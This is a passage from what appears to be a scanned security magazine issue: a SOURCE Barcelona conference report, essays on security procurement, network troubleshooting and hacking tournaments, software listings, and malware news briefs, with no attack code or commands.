jobs. It also requires a thorough examination 
of the available technologies and a determina- 
tion of which ones will most effectively protect 
data, depending on how it's used and where. 
In addition, many organizations must also 
comply with one or more data security man- 
dates or privacy laws. Such a vast and highly 
important project can often benefit from out- 
side assistance from a data security imple- 
mentation specialist. Working with an experi- 
enced data security vendor partner leverages 
the wealth of experience gained only by con- 
tinually aiding organizations across industries 
to implement data protection programs to 
meet a variety of objectives. 



Data security expert Abir Thakurta is sr. director of Professional Services for nuBridges (www.nubridges.com) 
where he plays a leading role in ensuring customer satisfaction through successful implementations of the 
company's solutions. He can be reached at athakurta@nubridges.com. 
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We spent four fantastic days in Barcelona attending our first SOURCE Con- 
ference. Apart from the one in Barcelona, there are two more affiliated 
SOURCE conferences that will be held throughout the year: the "original" one 
in Boston and the one they will be premiering mid-June next year in Seattle. 



What I really like about SOURCE is that it ca- 
ters to a group of some 80 people, which 
makes it very easy to meet with and talk to 
every participant and speaker. The majority of 
the attendees and lecturers are well known in 
the information security community - they are 
speakers at major industry events or influential 
researchers you are definitely familiar with via 
their blogs or Twitter streams. 

The best way to describe the SOURCE crowd 
is as one big family and this is surely one of 
the reasons of the success of this event. Peo- 
ple spend whole days together - sharing the 
rented apartments, attending the event, enjoy- 
ing tapas and sangria in the evenings. 

Stacy Thayer - the alpha and omega of the 
conference - chose Barcelona because she 
really liked the vibrant nature of the city and its 
beautiful architecture, and because there 
weren't any security events held in this city. 
Although, the conference will be getting some 



competition this year as Black Hat - after 
years of doing the show in Amsterdam - 
switched locations and will now be held in 
Barcelona, too. 

SOURCE Conference is held at the MNAC 
(Museu Nacional d'Art De Catalunya), an as- 
tonishingly beautiful building located just north 
of Placa d'Espanya, on the hills of Montjuic. 
The conference venue is located in the west 
part of the giant hall and it consists of two 
smaller auditoriums - one per track. 

Over 70 talks were submitted to the organizing 
board and about 22 of them passed the selec- 
tion. The selected speakers were a global 
bunch of security geeks. 

The event started at 10 am - one hour later 
than the usual start of the Boston event or the 
2009 Barcelona event. Stacy mentioned this 
was a result of the attendee feedback from the 
past year and I am all for it - Barcelona lives 
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and breathes a bit differently, and it is not un- 
usual to go to a dinner at around 10 pm. 

This year's SOURCE in Barcelona was 
opened by PriceWaterhouseCoopers' informa- 
tion security honcho William Beer with a pres- 
entation based on a report commissioned by 
the UK Government Technology Strategy 
Board. Mr. Beer discussed the drivers that will 



have the influence on shaping up the state of 
information security until 2020 and beyond. 

I have attended eight lectures, so I'll share 
some information on them. The keynote was 
followed by a joint presentation by Verizon 
Business' Alex Hutton and Paypal's Allison 
Miller, in which they shared their experience 
on simple, but effective approaches to threat 
modeling. 




Brian Honan from Ireland delivered a speech 
on setting up a CSIRT, during which he walked 
us through a scenario of organizing a CERT. 
We recently did a Q&A with Brian on this topic, 
so I was really interested in hearing more de- 
tails. My hat off to him and his team, it was 
certainly tough to set everything up - espe- 
cially because they have no government back- 
ing. Setting it up was a formidable task, but 
running daily operations on a volunteer basis 
is awe-inspiring. 

Jayson Street, author of "Dissecting the hack: 
The F0rb1dd3n Network" and co-founder of 
ExcaliburCon - the first information security 



(hacking) event to be held in China, gave a 
dynamic speech on social engineering. 

His take on it was a combination of historical 
pre-social engineering "attacks" including 
Egypt's Amenhotep III and the popular Trojan 
horse story, to practical variations on the 
methods he is using right now. 

He also shared some general views on what 
should social engineering focus on in different 
parts of the world. 
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Brian Honan during his presentation. 



The first day ended with a presentation by nice to see it now. At Black Hat, he managed 

Barnaby Jack on "jackpotting" of ATM ma- to get the machines transported to the confer- 

chines. He managed to hack some ATM ma- ence venue (about nine hours of driving), but 

chines and practically turned them into per- in Barcelona we used the powers of live 

sonal cash dispensers. I missed the presenta- streaming to witness the effects of his hack, 
tion when he had it during Black Hat, so it was 
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He was running the code remotely from Bar- 
celona and we had the video feed to show the 
results from the United States' East coast. As 
a side note - in Las Vegas, he didn't have the 
statistics for the number of this type of vulner- 
able ATMs in the U.S.A., but now he shared 
the figures - Tranax (the manufacturer of the 
ATMs in question) has a 30% share of around 
450,000 ATMs in the United States. 

The second day started with a three-hour long 
panel on anti-virus testing methods and pro- 
cedures. On the first day we talked with the 
panel moderator David Sancho and had 
planned some good questions for the panel, 



but unfortunately we just found out that the 
flight to BruCON was canceled so we had to 
spend the time checking for alternatives and 
possible workarounds. 

Andrew Hay and Chris Nickerson spent 45 
minutes entertaining the attendees with a very 
interesting take on creating a dialogue be- 
tween tech people (hackers) and the decision 
makers. They touched a number of scenarios 
we come across often and each took his side 
and discussed it from either a hacker (Chris) 
or business (Andrew) perspective. This was 
surely one of the best speeches at SOURCE 
Barcelona. 




Moving back to the security and tech audito- 
rium, I attended the Bruce Oliveira and Jibran 
llyas talk, where these Trustwave guys shared 
their views on the black hats they come 
across in their line of work (penetration testing 
and forensics). A heated debate started during 
the talk about whether these particular black 
hats were, in fact, just script kiddies. 

The final lecture of this year's Barcelona event 
was held by two local "boys" - Vicente Diaz 
and David Barroso from S21Sec. They did a 



thorough analysis of the popular underground 
forum Carders. cc - from its golden days after a 
competing forum went offline, until its demise 
after the server was broken into and all the 
information it contained shared via Rapid- 
Share. 

As far as I'm concerned, the speakers were 
interesting, the possibilities for networking 
were great, the atmosphere was relaxed, and I 
can't wait for the 2011 event! 
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Order today and protect your physical and 
electronic systems from attack! 




Available at Syngress.com, amazon.com or your favorite online retailer! 




Wireshark (www.net-security.org/software. php?id=735) 

Wireshark is the world's foremost network protocol analyzer, and is the de facto standard across 
many industries and educational institutions. 

Master Voyager (www.net-security.org/software.php?id=730) 

Master Voyager is especially designed to create protected DVD/CD discs and USB Memory 
Sticks. It creates protected areas on the media and it is needed to enter password to see pro- 
tected contents. In addition, all the protected Disc/USB Stick will be fully autonomous and will not 
require any special software installed on your PC. 

Total Privacy (www.net-security.org/software. php?id=729) 

Total Privacy can clean your browser's cache, cookies, web forms data, entries in your recent 
documents history, recent applications history, find files history, your temporary files, recycle bin, 
clean recent documents lists for popular applications, can recover Hard Disk space, and many 
more. 

File Encryption XP (www.net-security.org/software. php?id=728) 

With File Encryption XP, you can encrypt files of any type, including Microsoft Word, Excel and 
PowerPoint documents. It protects information against being viewed or modified without your 
authorization. 
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It's hard to believe another season of NCAA college basketball is upon us. 
Even before the first regular season tip-off, fans of the game are already 
laying bets as to who will be among the best teams in the nation. Most of 
the money is placed on the more well-known schools from the larger 
conferences. 



However, if the past showed us anything, it is 
that the "smart" bets are not always the ones 
that will earn you money. Recent history has 
seen a significant rise by smaller teams mak- 
ing it to the Top 25 rankings. 

Not that long ago, underrated George Mason 
University from the lesser-regarded Colonial 
Athletic Association got all the way to the cov- 
eted Final Four, despite going up against 
powerhouse squads like the Universities of 
Connecticut, Michigan State and North Caro- 
lina - teams that possessed far bigger 
budgets, players and supporters. 

Even for those who don't follow it, college 
basketball can be used as a perfect illustra- 
tion of one basic truth - that bigger and better 
known entities aren't necessarily the best 



ones. CSOs can learn a good lesson from this 
- which is that implementing the most popular 
policies, practices and systems will not, in and 
of themselves, make a network any more se- 
cure or the potential for cyber intrusions 
smaller. 

Keeping data protected and a high level of 
productivity requires due care and considera- 
tion not for what's easy, but for what's most 
effective and beneficial to an organization's 
specific needs. 

Before the next tournament begins, I'd rec- 
ommend to IT security managers to re- 
evaluate their product requirements based on 
the following criteria: 
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1 . Are the basics covered? 

Too often, a new system can be procured and 
implemented because what outsiders are 
pushing as a response to what's being re- 
ported on the six o'clock news, but without 
much regard to the probability that that issue 
will affect the company. Furthermore, reacting 
to the latest threat without having a solid se- 
curity foundation in place will only lead to 
more problems. ClOs would be better served 
by ensuring that they've got fundamental pro- 
tection in the forms of secure VPN access, 
unified threat management and email gate- 
way systems before adding other layers to the 
mix. Doing otherwise would be akin to a col- 
lege basketball team taking the field without a 
shooter; the game will be lost if no one on the 
court can make a play. 

2. Are your efforts coordinated? 

While security IT folks are the natural choice 
to lead efforts, they will not be the only ones 
involved. The ideal situation would be for all 
departments to have a designated represen- 
tative who would be responsible for coordinat- 
ing efforts within and outside their area. Think 
of it this way - a point guard may set up a 
play to drive to one side of the basket, but 
that's only going to work if the forward knows 
what to do to get open, catch the pass and 
then lay it in for two points. 

Herein lies the challenge for any company - 
policies and practices will often transcend ar- 
eas of responsibilities for individuals and 
managers, and failure to make security prac- 
tices seamless across these lines will create 
vulnerabilities that hackers seek to exploit. 

3. Will the products work for you? 

Popularity aside, the best way to determine if 
a system is going to work for you will be 
based on two factors; (a) its feature/function 
set and (b) its proven track record in similar 
environments. In basketball terms, it's called 
scouting; going beyond the brand logo that's 
affixed to a particular product and really un- 



derstanding the system's dynamics, strengths 
and benefits. 

In the IT security world, organizations should 
not have to determine this all on their own, but 
rather enlist their system integrators and 
product vendors to help make this happen. 
The best partners are the ones who have of- 
ferings that specifically meet this demand. 
They should also have an arsenal of best 
practices to provide companies with lessons 
learned from others. 

4. Do you have the right people in place? 

While this may appear odd coming from the 
head of a product manufacturer, I'm a firm be- 
liever that a robust security posture can only 
be delivered if there are good people in place 
to make it happen. Good teams can only go 
so far without good leadership and talented 
professionals; be it a college basketball team 
or IT staff. 

What's more, this is not unlike other business 
operations, such as offshore software devel- 
opment or outsourced product fulfillment, 
where long-standing benefits of such initia- 
tives are not realized without oversight and 
monitoring authority. 

Herein lies the dilemma for many companies. 
Budget debates must focus not just on im- 
plementing firewalls, e-mail gateways and 
unified threat management offerings, but also 
on the individuals and resources needed to 
set overarching policies and management 
procedures. If they are absent, all the money 
spent keeping up with the latest tools and 
systems will be for naught. 

The thing I enjoy most about college basket- 
ball is watching young teams that, while 
seemingly over their head on paper, play well 
against the bigger squads - sometimes even 
beating them. It should be a good reminder to 
many of us that the quality of a system should 
not measured according to the hype that sur- 
rounds it, but rather according to its effective- 
ness - and IT systems are no exception. 



Max Huang is the founder and President of 02Security, Inc. a manufacturer of high-performance network se- 
curity appliances for small- to medium-businesses as well as remote/branch offices, large enterprises and 
service providers. Max can be reached at max.huang@o2security.com. 
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"My application is slow. Is it the network?" How many times have you heard 
this question? Most likely too often, since network reliability is the first thing 
that is questioned when something happens. 



A network is comprised of any number of dif- 
ferent single components, all designed and 
configured to work together in an interde- 
pendent fashion. It is this interdependency 
that is difficult to decode. Network trouble- 
shooting requires logic and knowledge. 

One of the core responsibilities of the IT de- 
partment is to design, deploy and maintain a 
network that is secure and reliable, and then 
to monitor and manage it 24/7. But how do 
you troubleshoot the less obvious problems? 

Troubleshooting a network requires an in- 
depth knowledge of not only the physical con- 
nectivity of the network, but also how it is con- 
figured. 

Some of the troubleshooting challenges one 
must contend with on an everyday basis in- 
clude: 

• Lack of analysis and troubleshooting tools 



• Inadequate or outdated network documenta- 
tion 

• Deficient or non-existent change control 
policies 

• Limited knowledge of layer 2 topology and 
connectivity 

• Inconsistent system configuration 

• Loss of personnel with historical network 
knowledge 

• Multiple point solutions and tools 

The following is a simple five step plan to seek 
out where the problems lie. 

Step 1 : Eliminate the obvious 

Sometimes the root cause of a problem can 
be relatively simple. By starting with some of 
the more common sources first, you could 
save a lot of time. The list on the following 
page provides some suggestions about where 
to start your troubleshooting efforts. 
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• IP address conflicts 

• DNS errors 

• Improper subnet configuration 

• Switch port disabled 

• Open TCP ports 

• Failed device 

There are a lot of standalone tools available 
that can assist with locating the obvious prob- 
lems. Your monitoring solutions will also pro- 
vide notification when a device failure occurs. 
Once you have got the obvious things out of 
the way, you can start to look at the more 
complicated and difficult ones. 

Step 2: Digging deeper 

Troubleshooting a network requires patience 
and time. First ask yourself: 

• When did the problem first arise? 

o After the rollout of new devices or 

changes to the network 
o After changes to a single device 
o After deployment of a new application 

• Is it isolated to a particular set of devices or 
segment or is it systemic? 

• Is the problem occurring at layer 2 or layer 
3? 

• Is the problem occurring at the edge of the 
network? 

• What are the symptoms of the problem? 



o Degraded VoIP performance 
o Intermittent periods of slow 

performance 
o Periodic loss of connectivity 

• Have traffic or utilization patterns changed? 

o Unusual peaks 
o Increased utilization 

• Has your service provider made recent 
changes or had an outage? 

All network monitoring solutions can highlight 
and alert to problems involving connectivity, 
device failures, etc. What about troubleshoot- 
ing nebulous issues like a slow network? His- 
torically, network troubleshooting has been a 
largely manual process. Previously IT has had 
to rely on a set of static paper maps to piece 
together a "problem-area" map to troubleshoot 
a problem. 

One of the key issues using this method is the 
reliance on maps that may be outdated or in- 
accurate. The simple truth is that most net- 
work documentation is at least two or more 
generations behind the current state of the in- 
frastructure. 

If the network maps or diagrams are unavail- 
able or inaccurate, engineers move to the 
second and more time consuming method - 
manually discovering and creating network 
diagrams while troubleshooting. Either way, 
valuable time is lost diagnosing the problem. 



Without up-to-date information, troubleshooting any issue is 
going to be prolonged and most likely inaccurate 



Step 3: Building an up-to-date connectivity 
view 

Many monitoring solutions provide a discovery 
capability - some more in-depth than others. 
Ideally you will want one that identifies not 
only devices and servers, but VMware virtual 
machines, VLANs and port to port connec- 
tivity Since networks can be considered 'living 
entities', discovery should be run regularly to 
ensure that you are troubleshooting based on 
the most current state of the infrastructure. 



Without up-to-date information, troubleshoot- 
ing any issue is going to be prolonged and 
most likely inaccurate. 

Step 4: Examine performance metrics 

You are probably monitoring key performance 
metrics across your physical and server re- 
sources. When key monitored metrics such as 
processor utilization, memory utilization, stor- 
age, network usage or disk I/O are all indi- 
vidually well within the critical thresholds that 
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you have configured, you should be looking at 
the application level itself. 

Step 5: Analyze network traffic and 
configuration settings 

Recent studies estimate that 75% of network 
outages or degradations in performance are 
due to device or system misconfiguration. The 
remaining 25% are typically caused by inap- 
propriate usage, or attacks by malware or 
equipment failures. 

This is why troubleshooting efforts should in- 
clude flow monitoring and configuration man- 
agement, so you know what is happening in 
your current infrastructure at a much more de- 
tailed level. Here are some specific problem 
scenarios, to illustrate this point. 

Problem Scenario 1 : Access to a remote ap- 
plication seems to work fine for requests but 
responses are very slow. 

What types of traffic are passing over the 
WAN link? 

Using flow analysis, you can view the current 
traffic by type, source and destination. The 
analysis shows that the current traffic is nor- 
mal and bandwidth utilization is within the 
threshold. 



What has changed? 

Examining device configuration settings on 
either end of the WAN link you discover that a 
recent change to routing has introduced an 
asymmetric path. This configuration change 
resulted in traffic to the application taking the 
optimal path and traffic from the application 
taking a longer route, causing the slow appli- 
cation response time. 

Problem Scenario 2: Users are complaining 
about poor VoIP voice quality and dropped 
calls. 

Performance monitoring tools are not showing 
any failures or connectivity issues for any 
VoIP devices or servers. Is the problem iso- 
lated to certain segments or is it across the 
whole network? 

Flow analysis and looking at traffic across dif- 
ferent segments shows that congestion is oc- 
curring on a backbone segment and this is 
causing degraded VoIP quality and dropped 
calls. 

Detailed analysis of specific traffic types, QoS, 
and sources and destinations shows that even 
though VoIP has the highest priority, video 
downloads by the number of users is impact- 
ing the available bandwidth. 



Troubleshooting efforts should include flow monitoring and 
configuration management, so you know what is happening in 
your current infrastructure at a much more detailed level 



Problem Scenario 3: A segment of the net- 
work loses access to some server-based ap- 
plications but not others. 

What has changed? 

Using configuration analysis, the ACL on the 
segment switch was changed, resulting in the 
exclusion of a range of IP addresses, some of 
which are assigned to the servers running the 
applications. Revising the ACL restores the 
access to the applications. 



Problem Scenario 4: Bandwidth utilization 
suddenly rises to peak levels and is not de- 
clining. 

What type of traffic is it and where is it origi- 
nating? 

Using flow analysis tools you can find out 
source and traffic type, which in this case re- 
veals that a small UDP packet is being sent to 
all the IP address in the segment from a single 
machine. There are also packets being sent to 
a destination outside the network. 
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Determining the IP address of the source sys- 
tem, the system is put on an isolated VLAN 
and it is determined that the system was in- 
fected. A Trojan Horse was flooding the net- 
work with connection requests to other sys- 
tems to spread the infection. 

Conclusion 

Access to current and historical configuration 
data will provide a baseline from which it is 
simpler to understand the impact of changes 
to systems and the results of those changes. 

Technologies can quickly identify where bot- 
tlenecks and over utilization are occurring. 

By integrating more traditional monitoring ap- 
proaches that include network discovery and 



mapping, performance monitoring, real-time 
alerts and historical reports (combined with 
more advanced flow and configuration moni- 
toring and analysis tools), you can avoid 
common troubleshooting pitfalls. 

If you use a single IT management solution 
that offers monitoring across devices, servers, 
applications, physical and virtual resources, 
port-to-port connectivity, configuration and 
network traffic over a single console, it will in- 
crease network reliability and stability. 

Network troubleshooting is largely a process 
of elimination that can be frustrating and re- 
warding at the same time. Approach it one 
step at a time and good luck with your future 
troubleshooting endeavors! 



Ennio Carboni is the President of Ipswitch Network Management Division (www.ipswitch.com). He is responsi- 
ble for setting and managing the implementation of the division's strategic direction and leading its sustainable, 
profitable growth as a provider of network management solutions for effective management of wired and 
wireless networks in traditional and virtualized environments. 
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Security 

ASA 

Service 

Now Available at a Browser Near You 

Software-as-a-Service (SaaS) has been described as 
the most disruptive delivery model to ever face the enterprise 
software market for one simple reason: it works 

Qualys is the first company to deliver an on demand solution far security risk and compliance 
management. QualysGuard* is the widest deployed security on demand platform in the world, 
performing over 150 million IP audits per year — with no software to install and maintain. 

For a free trial, go to a browser near you. 
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Malware worl 



Targeted attacks focus on nationalistic and economic cyberterrorism 

Phishing, compromised websites, and social networking are carefully 
coordinated to steal confidential data, because in the world of cybercrime, 
content equals cash. And, as a new Websense report illustrates, the latest 
tactics have now moved to a political and nationalistic stage. 
(www.net-security.org/malware_news. php?id=1 526) 




A viable answer to the botnet problem? 

As the case of the Bredolab botnet takedown has shown yet again, going 
after C&Cs is ultimately a failed tactic for shutting botnets down. It is time to 
try something new, and two security researchers might be on the right track. 
Peter Greko and Fabian Rothschild have developed a number of methods 
that should severely compromise the accuracy of the collected data and, 
therefore, make the botmasters' customers unsatisfied with the 
merchandise, (www.net-security.org/malware_news. php?id=1 525) 



Man loses millions in computer virus-related scam 

A US court has heard that a couple conned at least $6 million from the great- 
grandson of an oil industry tycoon after he brought his virus-infected computer 
in for repair. Although the victim's name has not been released by the 
authorities, media reports have named him as jazz pianist and composer 
Roger Davidson. The couple are said to have tricked the composer into 
believing that, while investigating the virus, they had found evidence that his 
life was in danger - concocting a story that the virus had been tracked to a 
hard drive in Honduras, and that evidence had been found that the 
composer's life was in danger, (www.net-security.org/malware_news. php?id=1 524) 
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Microsoft offers Security Essentials via Windows Update, Trend Micro objects 

Trend Micro is crying foul over the Microsoft move that sees its U.S. 

customers being offered to install the company's free Security Essentials TR E N D 

solution through the Windows' Update service - if no antivirus solution is micro 
detected on the system. The computer security company is of the opinion 
that such a move offers Microsoft an unfair advantage over its competition. 
(www.net-security.org/malware_news. php?id=1 522) 



New variant of Boonana Trojan discovered 




A new variant of the Boonana malware has been discovered by ESET. The new 
variant, trojan.osx.boonana.b, behaves in a very similar manner to the original 
malware, and is currently being distributed on multiple sites. Rather than the initial 
site which tricks users into running (and installing) the malware, these servers 
seem to be hosting update code for the malware. 
(www.net-security.org/malware_news. php?id=1 521 ) 



ZeuS attackers set up honeypot for researchers 

Investigation into a spam campaign notifying potential victims that their tax 
payment was rejected due to an error with the Electronic Federal Tax Payment 
System has revealed that these ZeuS-peddling criminals used an exploit toolkit 
that had a fake administration panel which functions as a honeypot that documents 
details of every attempt to access it or hack it. 
(www.net-security.org/malware_news. php?id=1 520) 



A 11 private" banking Trojan competes with ZeuS 




The recent surge of brand new banking Trojans continues to give us more 
things to worry about. The latest one is named "Feodo", and it has been around 
for months now, but was probably considered to be a just variant of the more 
popular ZeuS and SpyEye malware. Further analysis showed that even though 
it has some features in common with them, Feodo has its own characteristics. 
(www.net-security.org/malware_news. php?id=1 505) 



Spam and virus trends according to Google 



The analysis of the data for Q3 of this year shows that spam is down by 
16% when compared to the numbers of the previous quarter, but that 
payload virus volume is up by a whooping 42%, making Google's 
experts speculate that the spam volumes in Q4 will raise again because 
the malicious payloads of this quarter are meant to enslave computers 
into spamming botnets just in time for them to be used during the 
holiday season, (www.net-security.org/malware_news. php?id=1 502) 
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Kaspersky download site hacked, redirecting users to fake AV 

Kaspersky's USA download site was hacked. For three and a half 
hours, it has been providing download links that redirected users to a 
malicious web page where windows telling them their computer was 
infected were popping up and they were encouraged to buy a fake AV 
solution, (www.net-security.org/malware_news. php?id=1 499) 



Bugat Trojan linked to Linkedln phishing campaign 



Researchers have discovered a new version of the Bugat financial malware 
used to commit online fraud. Bugat was distributed in the recent phishing 
campaign targeting Linkedln users, which was generally considered to be 
trying to infect machines with the more common Zeus Trojan. 
(www.net-security.org/malware_news. php?id=1 493) 



Trojan overrides Firefox password-saving behavior 

Whenever something of tangible value exist, there will always be those who will 
try to steal it, says a group of researchers that published a paper on future 
malware threats. They maintain that social networks will not only be the 
playground on which this malware will spread, but also the main target - due to the 
massive amount of data concerning relationships and communication patterns 
between people, (www.net-security.org/malware_news. php?id=1 490) 



The rise of crimeware 

CA researchers identified more than 400 new families of threats, led by 
rogue security software, downloaders and backdoors. Trojans were found to 
be the most prevalent category of new threats, accounting for 73 percent of 
total threat infections reported around the world. Importantly, 96 percent of 
Trojans found were components of an emerging underground trend towards 
organized cybercrime, or "Crimeware-as-a-Service." 
(www.net-security.org/malware_news. php?id=1 488) 



A peek into Google's anti-malware operation 

Google goes to great lengths to secure its users from threats lurking on the Web, 
because a half-hearted effort would soon drive them out of business. 

But, during his presentation at the SecTOR security conference in Toronto, Google 
security researcher Fabrice Jaubert revealed that sometimes even seemingly good 
methods are thwarted by careless users. 
(www.net-security.org/malware_news. php?id=1 51 6) 
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Cybercriminals aggressively recruiting money mules 



Money mules have been aggressively recruited this year to help cyber criminals 
launder money, according to Fortinet. A recent example of this is the worldwide 
prosecutions of a Zeus criminal operation, which included 37 charges brought 
against alleged money mules. 
(www.net-security.org/malware_news. php?id=1 51 3) 




Facebook phishing worm compromises thousands of accounts 




Avery effective phishing worm has been targeting Facebook users and has 
been compromising their accounts by luring them with the offer of seeing a 
video. The victim would receive a instant message from a contact asking "Is 
this you?" and supposedly offering a link to the video, but actually providing a 
link to a malicious Facebook application which loads a phishing page into an 
iframe. (www.net-security.org/malware_news. php?id=1 51 1 ) 



50 ISPs harbor half of all infected machines worldwide 



A group of researchers have recently released an analysis of the role that ISPs 
could play in botnet mitigation - an analysis that led to interesting conclusions. 
The often believed assumption that the presence of a high speed broadband 
connection is linked to the widespread presence of botnet infection in a country 
has been proven false, (www.net-security.org/malware_news. php?id=1 531) 




The persistence of Trojan attacks and scareware 



Statistics from GFI show a staggeringly consistent attack primarily by the same 
Trojan horse programs that have persisted for several months. Trojans 
detected as Trojan. Win32. GenericlBT were still the chief detection, slightly 
down to 23.54 percent of total detections. This generic detection includes more 
than 120,000 traces of malicious applications and has been in the top spot for 
many months, (www.net-security.org/malware_news. php?id=1 487) 




Arrests of money mules follow ZeuS gang takedowns 

Recent arrests and indictments of two gangs (one based in the U.K. and one 
in the U.S.) that used the ZeuS Trojan to syphon huge amounts of money 
from private and business banking accounts all over the two countries, has 
put a spotlight on the methods banks use to secure online transactions. So 
far, the investigations showed that the great majority of these illegal transfers 
were Automated Clearing House (ACH) transactions, and that they were 
unauthorized. In both cases, the members of the gangs were prevalently 
Eastern Europeans and Russian, (www.net-security.org/malware_news. php?id=1 485) 
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A merica's cy be r cold w ar 

by Blaine Anderson 



Considering the way the American government has treated hackers (ethical 
or not) in the past, I find it kind of ironic that it is now hosting hacking 
tournaments. 



It used to be that the public was taught to 
think that the only thing that hackers were 
good for is creating computer viruses, stealing 
people's identities, shutting down global net- 
works and launching nuclear attacks with a 
whistle and a telephone. Hackers were con- 
sidered to be "the outlaws of cyberspace" and 
the media portrayed them as being relent- 
lessly hunted by the American government 
and prosecuted to the fullest extent of the law. 

With the passing of the years, we discovered 
that most of what we thought was true, wasn't. 
Now we know that there is a difference be- 
tween a hacker and cracker; we know that 
many "hackers" have actually made the world 
a better place. The U.S.A. has gone from be- 
ing a country that persecutes hackers to one 
that organizes hacker camps and hosts 
hacker tournaments, encouraging children 
and individuals to take up "cyber arms" in or- 
der to gain the upper hand in the global cyber- 
arms race, which it is currently losing. 

American tournaments 

One of these tournaments is called NetWars. 
Established in June of 2009, it is basically an 
online version of a capture-the-flag style con- 



test. In order to compete in the tournament, 
competitors must download an ISO CD-ROM 
image (which can be burned to a disk or virtu- 
alized and booted from) and begin to exploit 
various weaknesses. Then, they must use 
their knowledge of exploits to score points by 
placing their name into root files within certain 
environments. As the competition unfolds, 
tournament administrators insert hurdles and 
roadblocks in order to make things more diffi- 
cult for the competitors. 

Contestants are also allowed to terminate 
other players' connections and exploits, dem- 
onstrating their offensive capabilities. It is a 
no-holds-barred competition that pits some of 
America's best up-and-coming hackers 
against each other. Competitors are allowed 
to use any and all software available to them, 
and in a previous event, one contestant was 
even given extra points for breaking into the 
scoring system and boosting his standing. The 
tournament lasts three days and is held every 
few months. The next competition is still un- 
scheduled because, as Ed Skoudis, one of the 
designers of Net Wars, tells me, "we've put 
NetWars on hold while we revamp the system. 
We're designing a whole new NetWars Next 
Generation, which we'll debut later in the fall." 
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The National Collegiate Cyber Defense Com- 
petition is held each year, and not only does it 
make the competitors fend off incoming at- 
tacks, but also asks of them to maintain a 
business network while doing it. "CCDC com- 
petitions ask student teams to assume admin- 
istrative and protective duties for an existing 
'commercial' network - typically a small com- 
pany with 50+ users, 7 to 10 servers, and 
common Internet services such as a web 
server, mail server, and e-commerce site," it 
says on the NCCDC's website. 

This event does more than just challenge the 
competitors to defend a network from outside 
attacks - it simulates a real-world environ- 
ment, giving college students a better idea of 
what they will be doing in their careers. While 
competitors are defending their system from 
attackers, they are also given various other 
tasks to accomplish throughout the tourna- 
ment. They are responsible for things like add- 
ing users to the Active Directory, changing set- 
tings on routers, or repairing FTP servers. 
This event is for college students only, and 
any students working in a full time IT position 
are disqualified from this tournament. 

The Air Force has also held a hacking chal- 
lenge in May of 2009, at the Department of 
Defense Intelligence Information Systems 
Worldwide Conference in Orlando, Florida. 
The goal was to develop the skills of some 
2000 security professionals in attendance, 
rather than recruiting fresh young talent. It is 
also a capture-the-flag style tournament, ex- 
cept that instead of attacking each other, 
teams of security professionals had four days 
to search isolated network for "flags" that had 
been planted by the hosts. Teams were 
placed in a dark room with strobe and flashing 
red lights, and were continuously bombarded 
with other distractions in order to simulate a 
real-world environment. There is no word on 
whether or not another competition like this 
will be held again. 

Most hacker tournaments are modeled after 
the competitions held at DEF CON - the larg- 
est and the best-known hacker convention in 
the world. Every year since 1993, DEF CON 
has attracted some of the most famous (and 
infamous) hackers in the world. Originally or- 
ganized by Jeff Moss, a.k.a. Dark Tangent, as 
a one-time "good-bye party" for the Platinum 



Net BBS system, it has grown into an annual 
occurrence that spans three days. 

Four years later, Moss created the Black Hat 
security conference. It was created as a 
means to gather security professionals and 
law enforcement into one place and urge them 
to share ideas, educate each other and dis- 
cuss cutting-edge research. Both of these 
events have set the bar for security conven- 
tions all over the world, as well as pushed for 
the acceptance of ethical hacking by main- 
stream society. 

These conferences were (and are) designed 
for people within the security community to 
disseminate information, and educate the pub- 
lic about the dual nature of hacking tech- 
niques - they can be used for good or for bad 
purposes. What was once considered a black 
hat attack on a company is now a white hat 
penetration test. By testing for vulnerabilities, 
professionals are able to create networks that 
are more secure and harder to break into. 
But, the U.S. isn't the only country organizing 
these types of challenges - throughout the 
world, hacker tournaments are moving from 
the dark corners of underground hacker con- 
ventions and are becoming government- 
sanctioned events. 

International tournaments 

The Nuit-du-hack competition has been held 
in France each year since 2003. This "Night of 
Hack" is modeled after DEF CON's Capture 
the Flag tournament. Twelve teams of five 
people compete from midnight till 7 A.M. in a 
capture-the-flag style competition, that also 
features guest speakers from top profession- 
als in the industry. Prizes include passes to 
Miami's Hacker Halted security conference 
and several other trainings, books, and 
equipment. 

The India-based Security Byte/OWASP con- 
vention has also recently hosted a capture- 
the-flag style tournament, offering prize 
money that totals over 150,000 Rupees 
(around $3,400.00). This convention is de- 
signed for security professionals from all over 
India and around the world. What makes CTF 
HackHunt unique is that it consists of three 
stages. 
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The first stage is a knowledge test, and only 
the top ten percent of competitors are allowed 
to compete in the next stage - a test of skills 
during which the contestant must retrieve a 
flag, which essential for registering for the 
main event. The third and final stage consists 
of compromising a predetermined wireless 
network protected by WPA or WPA2 encryp- 
tion. 

This tournament is one of the three that are 
held during this convention. Security Byte/ 
OWASP also hosts a competition called 
PacketWars - a real-time information warfare 
simulation, during which the same software 
and hardware one would encounter in the real 
world is featured. The third event is called 



Web War III. The first stage of the competition 
consists of two-men teams searching for vul- 
nerabilities in a web application hosted on a 
virtual web server and patching them. In the 
second stage, teams attack each other and try 
to exploit the vulnerabilities that haven't been 
patched. The team with the most points wins. 

These tournaments are only a small part of 
the security conference during which they are 
held. Although the aforementioned conven- 
tions held in India and France aren't 
government-sanctioned, you can be sure that 
recruiters from both the private and govern- 
ment sectors were in attendance and were 
keeping an eye on the competitors. 



Employing a cyber-offensive as part of a greater 
military campaign would give any invading or 
attacking country a great advantage 



What has changed? 

It used to be that agents from various gov- 
ernment agencies attended DEFCON and a 
number of other well-know hacker conven- 
tions in order to arrest wanted criminals. As 
the need for talented security professionals 
that would work for those agencies grew, they 
have begun sending recruiters to bring back 
employees - instead of agents looking to 
bring in suspects. Jim Gosler, the founding 
Director of the CIA's Clandestine Information 
Technology Office says that "there are only 
1000 security specialists with the skills 
needed working in the field, while somewhere 
between 20,000 and 30,000 are needed." 

Professor Philip Holt - a professional penetra- 
tion tester trained by the American govern- 
ment and respected information security pro- 
fessional - thinks that it is the government's 
lack of preparation that has us in the position 
we are in. According to him, the U.S. govern- 
ment has long had a "we can do it" mentality 
when it comes to cyber-security, but it is now 
slowly beginning to realize that they need help 

- lots of it, and fast. 

The U.S. has - along with the rest of the world 

- become increasingly reliant on computers 



and the networks they run on. Employing a 
cyber-offensive as part of a greater military 
campaign would give any invading or attack- 
ing country a great advantage. Nuclear power 
plants, dams and power grids, communication 
and transportation, finance and education - 
everything depends on computers. 

If we were to go to war with a super-power like 
China or Russia, it would only make sense for 
them to launch a cyber-offensive coinciding 
with the physical ground attack. In a television 
